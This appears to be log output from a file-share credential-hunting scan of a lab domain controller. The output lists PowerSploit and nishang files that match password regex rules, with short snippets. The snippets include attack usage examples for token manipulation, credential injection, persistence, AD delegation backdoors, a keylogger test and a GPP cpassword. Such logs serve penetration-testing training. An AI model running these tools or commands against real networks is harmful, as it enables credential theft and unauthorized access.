\ \ \ \ \ Write-Verbose\ "\[Get-GPPInnerField]\ Unable\ to\ retrieve\ ParentNode\.ParentNode\.LocalName\ for\ '\$File'"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Password\)\)\ \{\$Password\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$UserName\)\)\ \{\$UserName\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Changed\)\)\ \{\$Changed\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$NewName\)\)\ \{\$NewNa [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6.2kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Shells\Invoke-PsGcatAgent.ps1) \ unused\ and\ would\ be\ used\ with\ multiple\ agent\ support\ in\ future\.\ \n\n\.PARAMETER\ Delay\nDelay\ in\ seconds\ after\ a\ successful\ execution\.\ Default\ is\ 60\.\n\n\.EXAMPLE\nPS\ >\ Invoke-PSGcatAgent\ -Username\ psgcatlite\ -password\ pspassword\ -Delay\ 10\nPull\ latest\ command/script\ from\ Gmail\ and\ execute\ with\ a\ delay\ of\ 10\ seconds\.\n\n\.LINK\nhttp://www\.labofapenetrationtester\.com/2015/04/pillage-the-village-powershell-versi [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Green}<KeepNameContainsGreen|R|credential|1.4kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Get-VaultCredential.ps1xml) Get-VaultCredential.ps1xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Green}<KeepNameContainsGreen|R|credential|442.9kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Invoke-CredentialInjection.ps1) Invoke-CredentialInjection.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Green}<KeepNameContainsGreen|R|credential|19.8kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Get-VaultCredential.ps1) Get-VaultCredential.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|442.9kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Invoke-CredentialInjection.ps1) is\ Kerberos\.\ Msv1_0\ can\ be\ specified\ but\ should\ only\ be\ used\ for\ local\ accounts\ \(which\ can't\ use\ kerberos\)\.\n\n\t\n\ \ \ \ \.EXAMPLE\n\n\ \ \ \ Invoke-CredentialInjection\ -DomainName\ "demo"\ -UserName\ "administrator"\ -Password\ "Password1"\ -NewWinLogon\n\n\ \ \ \ Creates\ a\ new\ winlogon\ process\ \(as\ the\ SYSTEM\ account\)\ and\ creates\ a\ logon\ from\ within\ the\ process\ as\ demo\\administrator\.\ The\ logon\ will\ default\ to\n\ \ \ \ RemoteI [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|13.4kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPPassword.ps1) \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Verbose\ "\[Get-GPPInnerField]\ Unable\ to\ retrieve\ ParentNode\.ParentNode\.LocalName\ for\ '\$File'"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Password\)\)\ \{\$Password\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$UserName\)\)\ \{\$UserName\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Changed\)\)\ \{\$Changed\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$NewName\)\)\ \{\$NewNa [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|92.5kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Invoke-TokenManipulation.ps1) sing\ the\ primary\ token\ of\ LSASS\.exe\.\ This\ pipes\ the\ output\ of\ Get-Process\ to\ the\ "-Process"\ parameter\ of\ the\ script\.\n\n\.EXAMPLE\n\n\(Get-Process\ wininit\ \|\ Invoke-TokenManipulation\ -CreateProcess\ "cmd\.exe"\ -PassThru\)\.WaitForExit\(\)\n\nSpawns\ cmd\.exe\ using\ the\ primary\ token\ of\ LSASS\.exe\.\ Then\ holds\ the\ spawning\ PowerShell\ session\ until\ that\ process\ has\ exited\.\n\n\.EXAMPLE\n\nGet-Process\ wininit\ \|\ Invoke-TokenM [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|586.5kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Privesc\PowerUp.ps1) ing\[]]\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \$Name,\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$UserName\ =\ 'john',\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ 'Password123!',\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$LocalGroup\ =\ 'Administrators',\n\n\ \ \ \ \ \ \ \ \[Management\.Automation\.PSCredential]\n\ \ \ \ \ \ \ \ \[Management\.Automation\.Cre [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|38.2kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Persistence\Persistence.psm1) \ -OnIdle\n\$UserOptions\ =\ New-UserPersistenceOption\ -ScheduledTask\ -OnIdle\nAdd-Persistence\ -ScriptBlock\ \$RickRoll\ -ElevatedPersistenceOption\ \$ElevatedOptions\ -UserPersistenceOption\ \$UserOptions\ -Verbose\ -PassThru\ \|\ Out-EncodedCommand\ \|\ Out-File\ \.\\EncodedPersistentScript\.ps1\n\nDescription\n-----------\nCreates\ a\ script\ containing\ the\ contents\ of\ the\ provided\ scriptblock\ that\ when\ executed\ with\ the\ '-Per [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPsCredentials|R|-SecureString|752.2kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Recon\PowerView.ps1) \n"C:\\Windows\\example\.ini"\ \|\ Get-IniContent\ -OutputObject\n\nOutputs\ the\ \.ini\ details\ as\ a\ proper\ nested\ PSObject\.\n\n\.EXAMPLE\n\n"C:\\Windows\\example\.ini"\ \|\ Get-IniContent\n\n\.EXAMPLE\n\n\$SecPassword\ =\ ConvertTo-SecureString\ 'Password123!'\ -AsPlainText\ -Force\n\$Cred\ =\ New-Object\ System\.Management\.Automation\.PSCredential\('TESTLAB\\dfm\.a',\ \$SecPassword\)\nGet-IniContent\ -Path\ \\\\PRIMARY\.testlab\.local\\C\$\\Temp\\GptTmp [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPsCredentials|R|-SecureString|5kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\ScriptModification\Out-EncryptedScript.ps1) n\ be\ any\ string\ value\.\r\n\r\n\.PARAMETER\ InitializationVector\r\n\r\nSpecifies\ a\ 16-character\ the\ initialization\ vector\ to\ be\ used\.\ This\r\nis\ randomly\ generated\ by\ default\.\r\n\r\n\.EXAMPLE\r\n\r\n\$Password\ =\ ConvertTo-SecureString\ 'Password123!'\ -AsPlainText\ -Force\r\nOut-EncryptedScript\ \.\\Naughty-Script\.ps1\ \$Password\ salty\r\n\r\nDescription\r\n-----------\r\nEncrypt\ the\ contents\ of\ this\ file\ with\ a\ password\ and\ salt\.\ This [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|586.5kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Privesc\PowerUp.ps1) ing\[]]\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \$Name,\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$UserName\ =\ 'john',\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ 'Password123!',\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$LocalGroup\ =\ 'Administrators',\n\n\ \ \ \ \ \ \ \ \[Management\.Automation\.PSCredential]\n\ \ \ \ \ \ \ \ \[Management\.Automation\.Cre [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:04Z [File] {Red}<KeepPsCredentials|R|-SecureString|54.6kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Tests\Privesc.tests.ps1) rUp'\ not\ created\."\n\ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \$Null\ =\ \$\(net\ user\ PowerUp\ /delete\ >\$Null\ 2>&1\)\n\ \ \ \ }\n\n\ \ \ \ It\ 'Should\ accept\ a\ credential\ object\.'\ \{\n\ \ \ \ \ \ \ \ \$Username\ =\ 'PowerUp123'\n\ \ \ \ \ \ \ \ \$Password\ =\ ConvertTo-SecureString\ 'PASSword123!'\ -AsPlaintext\ -Force\ \n\ \ \ \ \ \ \ \ \$Credential\ =\ New-Object\ -TypeName\ System\.Management\.Automation\.PSCredential\ -ArgumentList\ \$Username,\ \$Password\n\n\ \ \ \ \ \ \ \ \$Output\ =\ Invoke-Serv [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:04Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|54.6kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Tests\Privesc.tests.ps1) 5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"\ name="SuperSecretBackdoor"\ image="0"\ changed="2013-04-25\ 18:36:07"\ uid="\{B5EDB865-34F5-4BD7-9C59-3AEB1C7A68C3}"><Properties\ action="C"\ fullName=""\ description=""\ cpassword="VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3"\ changeLogon="0"\ noChange="0"\ neverExpires="1"\ acctDisabled="0"\ userName="SuperSecretBackdoor"/></User></Groups>'\n\ \ \ \ \ \ \ \ \$Gr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:04Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|2.4kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Tests\Exfiltration.tests.ps1) MP\)\\key\.log"\ }\n\ \ \ \ \$WindowTitle\ =\ \(Get-Process\ -Id\ \$PID\)\.MainWindowTitle\n\ \ \ \ \n\ \ \ \ \$Shell\ =\ New-Object\ -ComObject\ wscript\.shell\n\ \ \ \ \$Shell\.AppActivate\(\$WindowTitle\)\n\ \ \ \ \n\ \ \ \ \$KeyLogger\ =\ Get-Keystrokes\ -PassThru\n\ \ \ \ Start-Sleep\ -Seconds\ 1\n\n\ \ \ \ \$Shell\.SendKeys\("Pester`b`b`b`b`b`b"\)\n\ \ \ \ \$KeyLogger\.Dispose\(\)\n\n\ \ \ \ It\ 'Should\ output\ to\ file'\ \{\ Test-Path\ "\$\(\$env:TEMP\)\\key\.log"\ \|\ Should\ Be\ \$true\ }\n\ \ \ \ \n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:04Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|54.6kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Tests\Privesc.tests.ps1) 5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"\ name="SuperSecretBackdoor"\ image="0"\ changed="2013-04-25\ 18:36:07"\ uid="\{B5EDB865-34F5-4BD7-9C59-3AEB1C7A68C3}"><Properties\ action="C"\ fullName=""\ description=""\ cpassword="VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3"\ changeLogon="0"\ noChange="0"\ neverExpires="1"\ acctDisabled="0"\ userName="SuperSecretBackdoor"/></User></Groups>'\n\ \ \ \ \ \ \ \ \$Gr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:04Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|36.8kB|2025-05-01 16:09:14Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit.build.ps1) e\ project\.\nAdd-BuildTask\ ImportModuleManifest\ \{\n\ \ \ \ Write-Build\ White\ '\ \ \ \ \ \ Attempting\ to\ load\ the\ project\ module\.'\n\ \ \ \ \$Script:moduleCommandTable\ =\ &\ \(Import-Module\ \$Script:ModuleManifestFile\ -Force\ -PassThru\)\ \{\ \$CommandTable\ }\n\ \ \ \ Write-Build\ Green\ "\ \ \ \ \ \ \.\.\.\$Script:ModuleName\ imported\ successfully"\n}\n\n\#\ Synopsis:\ Clean\ and\ reset\ Artifacts\ directory\.\nAdd-BuildTask\ Clean\ \{\n\ \ \ \ Write-Build\ White\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:04Z [File] {Green}<KeepNameContainsGreen|R|credential|409B|2025-05-01 16:09:37Z>(\\DC01.inlanefreight.local\IT\Tools\sysmon-modular-master\12_13_14_registry_event\include_credential_dumping_via_vss.xml) include_credential_dumping_via_vss.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:04Z [File] {Green}<KeepNameContainsGreen|R|passw|374B|2025-05-01 16:09:37Z>(\\DC01.inlanefreight.local\IT\Tools\sysmon-modular-master\12_13_14_registry_event\include_disable_password_change.xml) include_disable_password_change.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:05Z [File] {Green}<KeepNameContainsGreen|R|credential|1.2kB|2025-05-01 16:09:37Z>(\\DC01.inlanefreight.local\IT\Tools\sysmon-modular-master\12_13_14_registry_event\include_windows_credential_providers.xml) include_windows_credential_providers.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|18.2kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\DNS_TXT_Pwnage.ps1) Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 12,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 13,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 14,\ Mandatory\ =\ \$False [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPsCredentials|R|-SecureString|4.9kB|2025-05-01 16:08:27Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\ActiveDirectory\Add-ConstrainedDelegationBackdoor.ps1) \ new\ user\ \$SamAccountName"\n\ \ \ \ \ \ \ \ New-ADUser\ -Name\ \$Name\ -SamAccountName\ \$SamAccountName\ -UserPrincipalName\ \$UserPrincipalName\ -ServicePrincipalNames\ \$ServicePrincipalName\ -AccountPassword\ \(convertto-securestring\ "\$Password"\ -asplaintext\ -force\)\ \ -PasswordNeverExpires\ \$True\ \ -PassThru\ \|\ Enable-ADAccount\n\ \ \ \ \ \ \ \ \$user\ =\ Get-ADUser\ \$SamAccountName\ -Properties\ "msDS-AllowedToDelegateTo"\n\ \ \ \ }\n\ \ \ \ Wr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|18.2kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\DNS_TXT_Pwnage.ps1) Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 12,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 13,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 14,\ Mandatory\ =\ \$False [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPsCredentials|R|-SecureString|4.9kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\Add-ConstrainedDelegationBackdoor.ps1) \ new\ user\ \$SamAccountName"\n\ \ \ \ \ \ \ \ New-ADUser\ -Name\ \$Name\ -SamAccountName\ \$SamAccountName\ -UserPrincipalName\ \$UserPrincipalName\ -ServicePrincipalNames\ \$ServicePrincipalName\ -AccountPassword\ \(convertto-securestring\ "\$Password"\ -asplaintext\ -force\)\ \ -PasswordNeverExpires\ \$True\ \ -PassThru\ \|\ Enable-ADAccount\n\ \ \ \ \ \ \ \ \$user\ =\ Get-ADUser\ \$SamAccountName\ -Properties\ "msDS-AllowedToDelegateTo"\n\ \ \ \ }\n\ \ \ \ Wr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|12.4kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\Execute-OnTime.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 8,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 9,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 10,\ Mandatory\ =\ \$False, [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|4.9kB|2025-05-01 16:08:27Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\ActiveDirectory\Add-ConstrainedDelegationBackdoor.ps1) mdletBinding\(\)]\ Param\(\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 0,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$SamAccountName,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 1,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ "Password@123!",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 2,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Domain,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 3,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Ser [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|12.4kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\Execute-OnTime.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 8,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 9,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 10,\ Mandatory\ =\ \$False, [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|13.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\HTTP-Backdoor.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 8,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 9,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 10,\ Mandatory\ =\ \$False, [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|4.9kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\Add-ConstrainedDelegationBackdoor.ps1) mdletBinding\(\)]\ Param\(\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 0,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$SamAccountName,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 1,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ "Password@123!",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 2,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Domain,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 3,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Ser [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|13.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\HTTP-Backdoor.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 8,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 9,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 10,\ Mandatory\ =\ \$False, [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4.9kB|2025-05-01 16:08:27Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\ActiveDirectory\Add-ConstrainedDelegationBackdoor.ps1) mdletBinding\(\)]\ Param\(\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 0,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$SamAccountName,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 1,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ "Password@123!",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 2,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Domain,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 3,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Ser [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4.9kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Backdoors\Add-ConstrainedDelegationBackdoor.ps1) mdletBinding\(\)]\ Param\(\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 0,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$SamAccountName,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 1,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ "Password@123!",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 2,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Domain,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 3,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Ser [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Execution\Execute-Command-MSSQL.ps1) word\ for\ the\ 